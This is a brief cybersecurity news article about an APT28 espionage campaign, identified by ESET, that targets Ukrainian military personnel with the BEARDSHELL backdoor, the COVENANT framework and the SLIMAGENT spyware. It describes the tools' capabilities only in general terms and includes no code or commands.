Cybersecurity researchers have discovered a new cyber-espionage campaign targeting Ukrainian military personnel. The operation has been linked to the Russian state-backed hacking group APT28. According to researchers, the attackers are using two malware tools called BEARDSHELL and COVENANT. The campaign is mainly focused on secretly collecting intelligence from compromised systems.
Security experts say the activity was identified by researchers from ESET. Their analysis shows that the campaign has been active since April 2024. The attackers are specifically targeting systems used by Ukrainian military personnel. The main goal appears to be long-term surveillance and information gathering.
APT28 is a well-known cyber-espionage group that has been active for many years. The group is also known by other names such as Fancy Bear, Sednit, and Forest Blizzard. Researchers believe the group is connected to Unit 26165 of Russia’s military intelligence agency (GRU). It has previously targeted governments, defense organizations, and strategic institutions around the world.
According to the research findings, the attackers use a multi-stage attack process. In many cases the attack starts with social engineering techniques. Victims may receive malicious files that appear to be legitimate documents. Once the file is opened, the hidden malware begins executing in the background.
One of the key tools used in the campaign is BEARDSHELL, a custom backdoor created by the attackers. This malware allows hackers to remotely execute commands on infected systems. It is capable of downloading and running PowerShell commands on compromised machines. The malware communicates with the attackers using cloud-based infrastructure.
The attackers also use another tool called COVENANT, which is an open-source .NET post-exploitation framework. After the initial compromise, this tool helps attackers maintain control over the system. It allows them to move within the network and collect additional information. This makes it easier for the attackers to continue their surveillance activities.
Researchers also discovered another component used in the operation called SLIMAGENT. This program is designed to gather detailed information from infected systems. It can record keystrokes, capture screenshots, and monitor clipboard activity. These capabilities allow attackers to observe user behavior and collect sensitive data.
Security experts say the campaign shows the advanced capabilities of modern cyber-espionage groups. By combining custom malware with legitimate tools, attackers can hide their activity more effectively. The use of cloud services also helps them blend in with normal network traffic. Researchers warn that organizations related to defense and government should remain alert to such advanced threats.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
